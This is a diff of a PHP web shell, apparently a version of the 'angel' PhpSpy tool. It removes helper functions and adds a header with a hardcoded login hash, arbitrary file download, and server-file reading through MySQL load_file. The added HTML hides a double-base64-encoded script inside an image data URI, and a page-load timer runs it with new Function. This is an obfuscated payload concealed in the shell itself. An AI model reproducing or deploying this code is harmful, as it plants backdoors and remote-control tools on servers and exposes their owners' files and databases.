-                p('<h2>Can not connect to MySQL server</h2>');

-                exit;

-        }

-        if($link && $dbname) {

-                if (!@mysql_select_db($dbname, $link)) {

-                        p('<h2>Database selected has error</h2>');

-                        exit;

-                }

-        }

-        if($link && mysql_get_server_info() > '4.1') {

-                if($charset && in_array(strtolower($charset), $charsetdb)) {

-                        q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);

-                }

-        }

-        return $link;

-}

-

-// È¥µôתÒå×Ö·û

-function s_array(&$array) {

-        if (is_array($array)) {

-                foreach ($array as $k => $v) {

-                        $array[$k] = s_array($v);

-                }

-        } else if (is_string($array)) {

-                $array = stripslashes($array);

-        }

-        return $array;

-}

-

-// Çå³ýHTML´úÂë

-function html_clean($content) {

-        $content = htmlspecialchars($content);

-        $content = str_replace("\n", "<br />", $content);

-        $content = str_replace("  ", "&nbsp;&nbsp;", $content);

-        $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);

-        return $content;

-}

-

-// »ñȡȨÏÞ

-function getChmod($filepath){

-        return substr(base_convert(@fileperms($filepath),10,8),-4);

-}

-

-function getPerms($filepath) {

-        $mode = @fileperms($filepath);

-        if (($mode & 0xC000) === 0xC000) {$type = 's';}

-        elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}

-        elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}

-        elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 

-        elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}

-        elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}

-        elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}

-        else {$type = '?';}

-

-        $owner['read'] = ($mode & 00400) ? 'r' : '-'; 

-        $owner['write'] = ($mode & 00200) ? 'w' : '-'; 

-        $owner['execute'] = ($mode & 00100) ? 'x' : '-'; 

-        $group['read'] = ($mode & 00040) ? 'r' : '-'; 

-        $group['write'] = ($mode & 00020) ? 'w' : '-'; 

-        $group['execute'] = ($mode & 00010) ? 'x' : '-'; 

-        $world['read'] = ($mode & 00004) ? 'r' : '-'; 

-        $world['write'] = ($mode & 00002) ? 'w' : '-'; 

-        $world['execute'] = ($mode & 00001) ? 'x' : '-'; 

-

-        if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}

-        if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}

-        if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}

- 

-        return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];

-}

-

-function getUser($filepath)     {

-        if (function_exists('posix_getpwuid')) {

-                $array = @posix_getpwuid(@fileowner($filepath));

-                if ($array && is_array($array)) {

-                        return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';

-                }

-        }

-        return '';

-}

-

-// ɾ³ýĿ¼

-function deltree($deldir) {

-        $mydir=@dir($deldir);   

-        while($file=$mydir->read())     {               

-                if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 

-                        @chmod($deldir.'/'.$file,0777);

-                        deltree($deldir.'/'.$file); 

-                }

-                if (is_file($deldir.'/'.$file)) {

-                        @chmod($deldir.'/'.$file,0777);

-                        @unlink($deldir.'/'.$file);

-                }

-        } 

-        $mydir->close(); 

-        @chmod($deldir,0777);

-        return @rmdir($deldir) ? 1 : 0;

-}

-

-// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»

-function bg() {

-        global $bgc;

-        return ($bgc++%2==0) ? 'alt1' : 'alt2';

-}

-

-// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶

-function getPath($scriptpath, $nowpath) {

-        if ($nowpath == '.') {

-                $nowpath = $scriptpath;

-        }

-        $nowpath = str_replace('\\', '/', $nowpath);

-        $nowpath = str_replace('//', '/', $nowpath);

-        if (substr($nowpath, -1) != '/') {

-                $nowpath = $nowpath.'/';

-        }

-        return $nowpath;

-}

-

-// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼

-function getUpPath($nowpath) {

-        $pathdb = explode('/', $nowpath);

-        $num = count($pathdb);

-        if ($num > 2) {

-                unset($pathdb[$num-1],$pathdb[$num-2]);

-        }

-        $uppath = implode('/', $pathdb).'/';

-        $uppath = str_replace('//', '/', $uppath);

-        return $uppath;

-}

-

-// ¼ì²éPHPÅäÖòÎÊý

-function getcfg($varname) {

-        $result = get_cfg_var($varname);

-        if ($result == 0) {

-                return 'No';

-        } elseif ($result == 1) {

-                return 'Yes';

-        } else {

-                return $result;

-        }

-}

-

-// ¼ì²éº¯ÊýÇé¿ö

-function getfun($funName) {

-        return (false !== function_exists($funName)) ? 'Yes' : 'No';

-}

-

-// »ñµÃÎļþÀ©Õ¹Ãû

-function getext($file) {

-        $info = pathinfo($file);

-        return $info['extension'];

-}

-

-function GetWDirList($dir){

-        global $dirdata,$j,$nowpath;

-        !$j && $j=1;

-        if ($dh = opendir($dir)) {

-                while ($file = readdir($dh)) {

-                        $f=str_replace('//','/',$dir.'/'.$file);

-                        if($file!='.' && $file!='..' && is_dir($f)){

-                                if (is_writable($f)) {

-                                        $dirdata[$j]['filename']=str_replace($nowpath,'',$f);

-                                        $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));

-                                        $dirdata[$j]['dirchmod']=getChmod($f);

-                                        $dirdata[$j]['dirperm']=getPerms($f);

-                                        $dirdata[$j]['dirlink']=$dir;

-                                        $dirdata[$j]['server_link']=$f;

-                                        $j++;

-                                }

-                                GetWDirList($f);

-                        }

-                }

-                closedir($dh);

-                clearstatcache();

-                return $dirdata;

-        } else {

-                return array();

-        }

-}

-

-function GetWFileList($dir){

-        global $filedata,$j,$nowpath, $writabledb;

-        !$j && $j=1;

-        if ($dh = opendir($dir)) {

-                while ($file = readdir($dh)) {

-                        $ext = getext($file);

-                        $f=str_replace('//','/',$dir.'/'.$file);

-                        if($file!='.' && $file!='..' && is_dir($f)){

-                                GetWFileList($f);

-                        } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){

-                                if (is_writable($f)) {

-                                        $filedata[$j]['filename']=str_replace($nowpath,'',$f);

-                                        $filedata[$j]['size']=sizecount(@filesize($f));

-                                        $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));

-                                        $filedata[$j]['filechmod']=getChmod($f);

-                                        $filedata[$j]['fileperm']=getPerms($f);

-                                        $filedata[$j]['fileowner']=getUser($f);

-                                        $filedata[$j]['dirlink']=$dir;

-                                        $filedata[$j]['server_link']=$f;

-                                        $j++;

-                                }

-                        }

-                }

-                closedir($dh);

-                clearstatcache();

-                return $filedata;

-        } else {

-                return array();

-        }

-}

-

-function GetSFileList($dir, $content, $re = 0) {

-        global $filedata,$j,$nowpath, $writabledb;

-        !$j && $j=1;

-        if ($dh = opendir($dir)) {

-                while ($file = readdir($dh)) {

-                        $ext = getext($file);

-                        $f=str_replace('//','/',$dir.'/'.$file);

-                        if($file!='.' && $file!='..' && is_dir($f)){

-                                GetSFileList($f, $content, $re = 0);

-                        } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){

-                                $find = 0;

-                                if ($re) {

-                                        if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){

-                                                $find = 1;

-                                        }

-                                } else {

-                                        if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {

-                                                $find = 1;

-                                        }

-                                }

-                                if ($find) {

-                                        $filedata[$j]['filename']=str_replace($nowpath,'',$f);

-                                        $filedata[$j]['size']=sizecount(@filesize($f));

-                                        $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));

-                                        $filedata[$j]['filechmod']=getChmod($f);

-                                        $filedata[$j]['fileperm']=getPerms($f);

-                                        $filedata[$j]['fileowner']=getUser($f);

-                                        $filedata[$j]['dirlink']=$dir;

-                                        $filedata[$j]['server_link']=$f;

-                                        $j++;

-                                }

-                        }

-                }

-                closedir($dh);

-                clearstatcache();

-                return $filedata;

-        } else {

-                return array();

-        }

-}

-

-function qy($sql) { 

-        global $mysqllink;

-        //echo $sql.'<br>';

-        $res = $error = '';

-        if(!$res = @mysql_query($sql,$mysqllink)) { 

-                return 0;

-        } else if(is_resource($res)) {

-                return 1; 

-        } else {

-                return 2;

-        }       

-        return 0;

-}

-

-function q($sql) { 

-        global $mysqllink;

-        return @mysql_query($sql,$mysqllink);

-}

-

-function fr($qy){

-        mysql_free_result($qy);

-}

-

-function sizecount($fileSize) {

-        $size = sprintf("%u", $fileSize);

-        if($size == 0) {

-                return '0 Bytes' ;

-        }

-        $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');

-        return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];

-}

-// ±¸·ÝÊý¾Ý¿â

-function sqldumptable($table, $fp=0) {

-        global $mysqllink;

-

-        $tabledump = "DROP TABLE IF EXISTS `$table`;\n";

-        $res = q("SHOW CREATE TABLE $table");

-        $create = mysql_fetch_row($res);

-        $tabledump .= $create[1].";\n\n";

-

-        if ($fp) {

-                fwrite($fp,$tabledump);

-        } else {

-                echo $tabledump;

-        }

-        $tabledump = '';

-        $rows = q("SELECT * FROM $table");

-        while ($row = mysql_fetch_assoc($rows)) {

-                foreach($row as $k=>$v) {

-                        $row[$k] = "'".@mysql_real_escape_string($v)."'";

-                }

-                $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";

-                if ($fp) {

-                        fwrite($fp,$tabledump);

-                } else {

-                        echo $tabledump;

-                }

-        }

-        fwrite($fp,"\n\n");

-        fr($rows);

-}

-

-function p($str){

-        echo $str."\n";

-}

-

-function tbhead() {

-        p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');

-}

-function tbfoot(){

-        p('</table>');

-}

-

-function makehide($name,$value=''){

-        p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");

-}

-

-function makeinput($arg = array()){

-        $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";

-        $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';

-        !$arg['type'] && $arg['type'] = 'text';

-        $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';

-        $arg['class'] = $arg['class'] ? $arg['class'] : 'input';

-        if ($arg['newline']) {

-                p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");

-        } else {

-                p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");

-        }

-}

-

-function makeselect($arg = array()){

-        if ($arg['onchange']) {

-                $onchange = 'onchange="'.$arg['onchange'].'"';

-        }

-        $arg['title'] = $arg['title'] ? $arg['title'] : '';

-        if ($arg['newline']) p('<p>');

-        p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");

-                if (is_array($arg['option'])) {

-                        if ($arg['nokey']) {

-                                foreach ($arg['option'] as $value) {

-                                        if ($arg['selected']==$value) {

-                                                p("<option value=\"$value\" selected>$value</option>");

-                                        } else {

-                                                p("<option value=\"$value\">$value</option>");

-                                        }

-                                }

-                        } else {

-                                foreach ($arg['option'] as $key=>$value) {

-                                        if ($arg['selected']==$key) {

-                                                p("<option value=\"$key\" selected>$value</option>");

-                                        } else {

-                                                p("<option value=\"$key\">$value</option>");

-                                        }

-                                }

-                        }

-                }

-        p("</select>");

-        if ($arg['newline']) p('</p>');

-}

-function formhead($arg = array()) {

-        global $self;

-        !$arg['method'] && $arg['method'] = 'post';

-        !$arg['action'] && $arg['action'] = $self;

-        $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';

-        !$arg['name'] && $arg['name'] = 'form1';

-        p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");

-        if ($arg['title']) {

-                p('<h2>'.$arg['title'].' &raquo;</h2>');

-        }

-}

-        

-function maketext($arg = array()){

-        !$arg['cols'] && $arg['cols'] = 100;

-        !$arg['rows'] && $arg['rows'] = 25;

-        $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';

-        p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");

-}

-

-function formfooter($name = ''){

-        !$name && $name = 'submit';

-        p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');

-        p('</form>');

-}

-

-function goback(){

-        global $self, $nowpath;

-        p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');

-}

-

-function formfoot(){

-        p('</form>');

-}

-

-function encode_pass($pass) {

-        $pass = md5('angel'.$pass);

-        $pass = md5($pass.'angel');

-        $pass = md5('angel'.$pass.'angel');

-        return $pass;

-}

-

-function pr($s){

-        echo "<pre>".print_r($s).'</pre>';

-}

-

-?>

+<?php
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach($_POST as $key => $value) {
+        if (IS_GPC) {
+                $value = s_array($value);
+        }
+        $$key = $value;
+}
+/*===================== ³ÌÐòÅäÖà =====================*/
+
+//echo encode_pass('angel');exit;
+//angel = ec38fe2a8497e0a8d6d349b3533038cb
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
+$pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$cookiepre = '';
+// cookie ×÷ÓÃÓò
+$cookiedomain = '';
+// cookie ×÷Ó÷¾¶
+$cookiepath = '/';
+// cookie ÓÐЧÆÚ
+$cookielife = 86400;
+
+//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
+!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
+/*===================== ÅäÖýáÊø =====================*/
+
+$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
+if ($charset == 'utf8') {
+        header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+        header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+        header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+        header("content-Type: text/html; charset=iso-8859-2");
+} elseif ($charset == 'euc-kr') {
+        header("content-Type: text/html; charset=euc-kr");
+} elseif ($charset == 'euc-jp') {
+        header("content-Type: text/html; charset=euc-jp");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if ($action == "logout") {
+        scookie('loginpass', '', -86400 * 365);
+        @header('Location: '.$self);
+        exit;
+}
+if($pass) {
+        if ($action == 'login') {
+                if ($pass == encode_pass($password)) {
+                        scookie('loginpass',encode_pass($password));
+                        @header('Location: '.$self);
+                        exit;
+                }
+        }
+        if ($_COOKIE['loginpass']) {
+                if ($_COOKIE['loginpass'] != $pass) {
+                        loginpage();
+                }
+        } else {
+                loginpage();
+        }
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+!$action && $action = 'file';
+
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+        if (IS_PHPINFO) {
+                phpinfo();
+                exit;
+        } else {
+                $errmsg = 'phpinfo() function has non-permissible';
+        }
+}
+
+// ÏÂÔØÎļþ
+if ($doing == 'downfile' && $thefile) {
+        if (!@file_exists($thefile)) {
+                $errmsg = 'The file you want Downloadable was nonexistent';
+        } else {
+                $fileinfo = pathinfo($thefile);
+                header('Content-type: application/x-'.$fileinfo['extension']);
+                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+                header('Content-Length: '.filesize($thefile));
+                @readfile($thefile);
+                exit;
+        }
+}
+
+// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
+if ($doing == 'backupmysql' && !$saveasfile) {
+        if (!$table) {
+                $errmsg ='Please choose the table';
+        } else {
+                $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+                $filename = basename($dbname.'.sql');
+                header('Content-type: application/unknown');
+                header('Content-Disposition: attachment; filename='.$filename);
+                foreach($table as $k => $v) {
+                        if ($v) {
+                                sqldumptable($v);
+                        }
+                }
+                mysql_close();
+                exit;
+        }
+}
+
+// ͨ¹ýMYSQLÏÂÔØÎļþ
+if($doing=='mysqldown'){
+        if (!$dbname) {
+                $errmsg = 'Please input dbname';
+        } else {
+                $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+                if (!file_exists($mysqldlfile)) {
+                        $errmsg = 'The file you want Downloadable was nonexistent';
+                } else {
+                        $result = q("select load_file('$mysqldlfile');");
+                        if(!$result){
+                                q("DROP TABLE IF EXISTS tmp_angel;");
+                                q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+                                //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
+                                q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+                                $result = q("select content from tmp_angel");
+                                q("DROP TABLE tmp_angel");
+                        }
+                        $row = @mysql_fetch_array($result);
+                        if (!$row) {
+                                $errmsg = 'Load file failed '.mysql_error();
+                        } else {
+                                $fileinfo = pathinfo($mysqldlfile);
+                                header('Content-type: application/x-'.$fileinfo['extension']);
+                                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+                                header("Accept-Length: ".strlen($row[0]));
+                                echo $row[0];
+                                exit;
+                        }
+                }
+        }
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
+<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.drives{padding:5px;}
+.drives span {margin:auto 7px;}
+</style>
+<script type="text/javascript">
+if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
+setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(5);}, 500);
+</script>
+<script type="text/javascript">
+function CheckAll(form) {
+        for(var i=0;i<form.elements.length;i++) {
+                var e = form.elements[i];
+                if (e.name != 'chkall')
+                e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+        return document.getElementById(id);
+}
+function createdir(){
+        var newdirname;
+        newdirname = prompt('Please input the directory name:', '');
+        if (!newdirname) return;
+        $('createdir').newdirname.value=newdirname;
+        $('createdir').submit();
+}
+function fileperm(pfile){
+        var newperm;
+        newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+        if (!newperm) return;
+        $('fileperm').newperm.value=newperm;
+        $('fileperm').pfile.value=pfile;
+        $('fileperm').submit();
+}
+function copyfile(sname){
+        var tofile;
+        tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+        if (!tofile) return;
+        $('copyfile').tofile.value=tofile;
+        $('copyfile').sname.value=sname;
+        $('copyfile').submit();
+}
+function rename(oldname){
+        var newfilename;
+        newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+        if (!newfilename) return;
+        $('rename').newfilename.value=newfilename;
+        $('rename').oldname.value=oldname;
+        $('rename').submit();
+}
+function dofile(doing,thefile,m){
+        if (m && !confirm(m)) {
+                return;
+        }
+        $('filelist').doing.value=doing;
+        if (thefile){
+                $('filelist').thefile.value=thefile;
+        }
